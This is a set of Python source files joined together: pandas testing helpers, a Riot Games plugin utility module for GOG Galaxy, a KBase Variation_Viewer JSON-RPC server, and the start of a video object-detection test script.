"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
misc.py
|
import os, asyncio, logging, subprocess, tempfile, multiprocessing
from types import FunctionType
import requests
from consts import LOCAL_FILE_CACHE
log = logging.getLogger(__name__)
async def get_size_at_path(start_path, *, if_none=None):
if start_path is None:
return if_none
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
await asyncio.sleep(0)
fp = os.path.join(dirpath, f)
if not os.path.islink(fp):
total_size += os.path.getsize(fp)
log.debug(f"Size: {total_size} bytes - {start_path}")
return total_size # in bytes
def get_product_settings_path(game_id):
# Given the game ID, returns the path of the product settings yaml file.
return os.path.expandvars(
"%PROGRAMDATA%\\Riot Games\\Metadata\\{0}.live\\{0}.live.product_settings.yaml".format(
game_id
)
)
def run(cmd, *, shell=False):
log.info(f"Running: {cmd}")
return subprocess.Popen(cmd, shell=shell)
def open_path(path, args=[]):
cmd = f'"{path}" {" ".join(args)}'.strip()
log.info(f"Opening: {path}\nWith args: {args}")
return run(cmd)
PROCESSES = []
def _download(u, c):
r = requests.get(u)
download_path = os.path.join(tempfile.gettempdir(), u.split("/")[-1])
with open(download_path, "wb") as f:
f.write(r.content)
c(download_path)
def download(url, callback: FunctionType):
log.info(f"Downloading: {url}")
proc = multiprocessing.Process(target=_download, args=(url, callback))
proc.start()
PROCESSES.append(proc)
return proc
def kill_all_processes():
for proc in PROCESSES:
proc.terminate()
def cleanup(): # Clean up files created by/for earlier version of the plugin not needed anymore
old_riot_client_location_file = os.path.expandvars(
"%LOCALAPPDATA%\\GOG.com\\Galaxy\\plugins\\installed\\riot_client_location.txt"
)
old_installer_path = os.path.abspath(
os.path.join(os.path.abspath(__file__), "..", "..", "riot_installer.exe")
)
old_delete_paths = [old_riot_client_location_file, old_installer_path]
old_local_file_cache = os.path.abspath(
os.path.join(os.path.abspath(__file__), "..", "..", "play_time_cache.txt")
) # don't delete just rename
for path in old_delete_paths:
if os.path.isfile(path):
os.remove(path)
if os.path.isfile(old_local_file_cache):
os.rename(old_local_file_cache, LOCAL_FILE_CACHE)
|
Variation_ViewerServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Variation_Viewer.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Variation_Viewer'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Variation_Viewer.Variation_ViewerImpl import Variation_Viewer # noqa @IgnorePep8
impl_Variation_Viewer = Variation_Viewer(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Variation_Viewer'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Variation_Viewer.run_Variation_Viewer,
name='Variation_Viewer.run_Variation_Viewer',
types=[dict])
self.method_authentication['Variation_Viewer.run_Variation_Viewer'] = 'required' # noqa
self.rpc_service.add(impl_Variation_Viewer.status,
name='Variation_Viewer.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Variation_Viewer ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test.py
|
import boto3
import os
import sys
import cv2
import numpy
import requests
import json
import logging
import threading
import queue
import coco_label_map
ENDPOINT = 'http://localhost:8501/v1/models/default:predict'
TMP_FILE = "./tmp.mov"
FRAME_BATCH=5
FRAME_MAX=20
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s',
handlers=[ logging.StreamHandler(sys.stdout) ],
)
log = logging.getLogger()
def get_predictions_from_image_array(batch):
res = requests.post(ENDPOINT, json={ 'instances': batch })
return res.json()['predictions']
def get_classes_with_scores(predictions):
vals = []
for p in predictions:
num_detections = int(p['num_detections'])
detected_classes = p['detection_classes'][:num_detections]
detected_classes =[coco_label_map.label_map[int(x)] for x in detected_classes]
detection_scores = p['detection_scores'][:num_detections]
vals.append(list(zip(detected_classes, detection_scores)))
return vals
def prepare(prepare_queue, inference_queue):
while True:
inference_queue.put(prepare_queue.get().tolist())
def add_to_prepare(prepare_queue, frames):
for f in frames:
prepare_queue.put(f)
frames.clear()
def process_video_from_file(file_path, prepare_queue, inference_queue):
log.info('process_video_from_file')
frames = []
vidcap = cv2.VideoCapture(file_path)
success, frame = vidcap.read()
success = True
log.info('start frame extraction')
max_frame = 0
while success:
frames.append(frame)
success, frame = vidcap.read()
max_frame += 1
if max_frame == FRAME_MAX:
break
log.info('end frame extraction')
count = len(frames)
add_worker = threading.Thread(target=add_to_prepare, args=(prepare_queue, frames,))
add_worker.start()
log.info('frame count: %d', count)
batch = []
predictions = []
log.info('frame batch %d', FRAME_BATCH)
for i in range(count):
batch.append(inference_queue.get())
if len(batch) == FRAME_BATCH or i == (count - 1):
log.info('range: %d - batch: %d', i, len(batch))
for v in get_classes_with_scores(get_predictions_from_image_array(batch)):
predictions.append(str(v))
